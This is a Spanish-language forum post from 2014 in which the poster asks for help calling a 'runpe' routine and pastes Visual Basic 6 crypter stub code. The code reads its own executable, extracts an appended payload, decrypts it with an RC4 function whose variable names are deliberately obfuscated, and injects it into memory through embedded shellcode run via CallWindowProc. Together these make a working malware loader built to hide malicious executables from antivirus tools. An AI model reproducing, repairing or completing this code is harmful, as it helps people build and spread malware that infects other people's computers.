Título: ayuda con llamar runpe Publicado por: mirkosenior en 6 Junio 2014, 12:06 pm hola a todos
¿Cómo puedo llamar a este runpe? ¿Alguien puede decirme dónde está el error? Sub Main() Dim AAAA As String AAAA = App.Path & "\" & App.EXEName & ".exe" Dim BBBB As String Open AAAA For Binary As #1 BBBB = Space(LOF(1)) Get #1, , BBBB Close #1 Dim sData() As String sData() = Split(BBBB, "[Theref]") sData(1) = ¥¶V«baDJØǬpRÆRQSgfâdãqG(sData(1), sData(2)) Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode)) End Sub 'RC4 Function ¥¶V«baDJØǬpRÆRQSgfâdãqG(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh As String, b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc As String) As String Dim DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() As Byte Dim WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() As Byte Dim ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ As Long Dim úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® As Long Dim YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ As Long Dim ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã As Long WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() = StrConv(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh, vbFromUnicode) DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() = StrConv(b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc, vbFromUnicode) YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ = UBound(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E) ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã = UBound(DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj) Do Until ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ > YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) = WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) Xor DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj(úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY®) úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® + 1 If úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® > ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã Then úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = 0 ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ = ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ + 1 Loop Erase DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj ¥¶V«baDJØǬpRÆRQSgfâdãqG = StrConv(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E, vbUnicode) Erase WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E End Function 'RUNPE Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long Dim Asm(121) As Currency Asm(0) = 400681687.6885@ Asm(1) = -476253789078555.0612@ Asm(2) = 169590654935207.5756@ Asm(3) = 850533864474419.4055@ Asm(4) = 737729641913629.2885@ Asm(5) = 241583047782310.0933@ Asm(6) = 24366994722224.3183@ Asm(7) = -5591197446420.7926@ Asm(8) = 909185617598340.8258@ Asm(9) = -19175285449154.725@ Asm(10) = -74963712694652.2037@ Asm(11) = 364813893865675.1812@ Asm(12) = 417268265771289.998@ Asm(13) = -4467533218940.2859@ Asm(14) = 341408918860883.873@ Asm(15) = 24329165641253.0572@ Asm(16) = -704495800380865.7131@ Asm(17) = 374040769202653.0293@ Asm(18) = 132891045878384.5141@ Asm(19) = 330853606455412.8782@ Asm(20) = -18546831736735.2555@ Asm(21) = 319791640719971.9498@ Asm(22) = 908565053235531.3645@ Asm(23) = 204495311115001.8554@ Asm(24) = -854751321242618.2143@ Asm(25) = -74261121419612.3536@ Asm(26) = -853017920184789.9651@ Asm(27) = 853018044985278.6574@ Asm(28) = 11660982868296.5087@ Asm(29) = -644057630032745.1903@ Asm(30) = 389428549114434.7534@ Asm(31) = -76145685875174.3891@ Asm(32) = -74907416031185.4908@ Asm(33) = 494446016607881.1334@ Asm(34) = 373919167982197.785@ Asm(35) = -702326214173594.214@ Asm(36) = 852984839970549.146@ Asm(37) = 878491366656617.7029@ Asm(38) = 11660149244069.3242@ Asm(39) = -644057520081529.9839@ Asm(40) = 852992269963661.735@ Asm(41) = 118191623639287.4757@ Asm(42) = -61508987237432.1588@ Asm(43) = 683482598548397.6903@ Asm(44) = -602576477534616.4219@ Asm(45) = 312616265869225.0362@ Asm(46) = 823209967166017.4093@ Asm(47) = 242250886584983.6374@ Asm(48) = 855453146203670.4029@ Asm(49) = -79066168407783.6283@ Asm(50) = -566073494675362.3812@ Asm(51) = 707480649289074.6628@ Asm(52) = -637454398289603.5604@ Asm(53) = 244386299675628.5445@ Asm(54) = -815078417416403.5827@ Asm(55) = -18879051943875.1995@ Asm(56) = -822123707815930.6686@ Asm(57) = -18434021046527.2954@ Asm(58) = 912451606937402.8942@ Asm(59) = -644057520081529.9756@ Asm(60) = 736754098641473.959@ Asm(61) = 417322719301766.6436@ Asm(62) = 907260734372726.4513@ Asm(63) = 853017967675867.3294@ Asm(64) = 11660982865150.7807@ Asm(65) = -854635987033189.5019@ Asm(66) = 417315068676156.9237@ Asm(67) = -704495800377680.6639@ Asm(68) = 244384539136657.2125@ Asm(69) = -815078417416403.5827@ Asm(70) = 364126617392252.4421@ Asm(71) = 853022663170544.6404@ Asm(72) = -855129000041499.1355@ Asm(73) = 853017946071693.9733@ Asm(74) = 244396803451753.601@ Asm(75) = -535694978088672.9971@ Asm(76) = 853017945341749.0318@ Asm(77) = 850597150951837.7055@ Asm(78) = -693956410164477.1442@ Asm(79) = 392299672072137.6649@ Asm(80) = -75273081301284.3259@ Asm(81) = 233670410612668.8112@ Asm(82) = 232135816315923.5976@ Asm(83) = 282468056240967.6881@ Asm(84) = -701595207746232.5423@ Asm(85) = 173478023424630.523@ Asm(86) = -838890426140287.6832@ Asm(87) = 137505075359453.7978@ Asm(88) = 238303243668856.6869@ Asm(89) = 15754679864024.2693@ Asm(90) = 137137957478099.5152@ Asm(91) = 223974408162476.2226@ Asm(92) = -853018149249239.2854@ Asm(93) = 609147958724062.3211@ Asm(94) = 187716700156924.5176@ Asm(95) = 29051557366465.6234@ Asm(96) = 180486733836584.4849@ Asm(97) = -853018043593043.5209@ Asm(98) = 230703534374533.4347@ Asm(99) = 138151919766295.2044@ Asm(100) = -863941699156868.1112@ Asm(101) = 382501322004887.7562@ Asm(102) = 217671250279223.4602@ Asm(103) = -858396642110759.3865@ Asm(104) = 382501330594822.3482@ Asm(105) = 217671250279223.4602@ Asm(106) = -860029196975681.1913@ Asm(107) = 22128918341666.201@ Asm(108) = 129708668231386.2504@ Asm(109) = 138421474714790.2981@ Asm(110) = 273938087394568.7415@ Asm(111) = -703427576466491.6105@ Asm(112) = 368089803424522.0018@ Asm(113) = 273936330801683.6989@ Asm(114) = -703427576466491.6105@ Asm(115) = 382501322232107.5439@ Asm(116) = 224650062758754.033@ Asm(117) = -802975918546864.1941@ Asm(118) = 261111522452255.6862@ Asm(119) = 35367660677206.1368@ Asm(120) = 848492795353964.3185@ Asm(121) = 5.0164@ 'Put Here the shellcode eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0) End Function |